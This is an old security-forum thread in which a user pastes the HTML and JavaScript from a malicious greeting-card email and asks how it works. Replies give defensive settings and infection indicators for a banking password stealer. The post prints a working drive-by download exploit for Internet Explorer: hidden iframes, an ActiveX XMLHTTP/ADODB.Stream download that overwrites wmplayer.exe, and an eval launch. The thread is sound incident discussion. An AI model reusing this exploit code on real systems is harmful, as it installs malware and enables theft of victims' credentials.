stream downloads mplayer

Discussion in 'adware, spyware & hijack cleaning' started by netk, Dec 13, 2003.

Thread Status:
Not open for further replies.
  1. netk

    netk Registered Member

    Joined:
    Dec 13, 2003
    Posts:
    1
    This came in my email .................

    From 123greetings.com

    which is really this

    <iframe src="spy.htm" height="0" width="0">f</iframe>
    <iframe src="start.html" height="0" width="0">f</iframe>
    <object data="1.php"></object>
    <textarea id="code" style="display:none;">
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "downloadlink to an executable called tr.exe",0);
    x.Send();
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";
    </textarea>
    <script language="javascript">
    function preparecode(code) {
    result = '';
    lines = code.split(/\r\n/);
    for (i=0;i<lines.length;i++) {
    line = lines;
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/[/]/g,"%2f");
    if (line != '') {
    result += line +'\\r\\n';
    }
    }
    return result;
    }
    function doit() {
    mycode = preparecode(document.all.code.value);
    myURL = "file:javascript:eval('" + mycode + "')";
    window.open(myURL,"_media")
    }
    window.open("error.jsp","_media");
    setTimeout("doit()", 5000);
    </script>
    so this is an example of server script becoming client script.

    Which is great for web services and ecommerce but NOT for Assholes that want to trash my system.

    Can someone explain the bug in mplayer.exe that is being exploited. Is it a recompile with a wrapper ?




    What you gonna do, or am I going to Linux.
     
  2. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,331
    Location:
    Netherlands
    Hi netk,

    I will remove some of the links out of your post, because we don't want anyone else to get in any problems.

    You don't need to switch to Linux to avoid this.
    Don't allow ActiveX outside your trusted zone and keep Outlook out of your trusted zone.

    Regards,

    Pieter
     
  3. Gavin - DiamondCS

    Gavin - DiamondCS Former DCS Moderator

    Joined:
    Feb 10, 2002
    Posts:
    2,080
    Location:
    Perth, Western Australia
    Hi,

    This is a password stealer which monitors keystrokes in certain BANK ACCOUNT WEBPAGES. Very nasty. I would advise that if you use EGold, or any online banking services that you check your accounts very carefully, and then change your passwords if you have been infected

    Ensure you were never infected with this first.. it adds a RUN key here

    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    "thememan"

    And the file goes to Windows\System (or system32) thememan.exe
    This is a sure sign of infection
     
Thread Status:
Not open for further replies.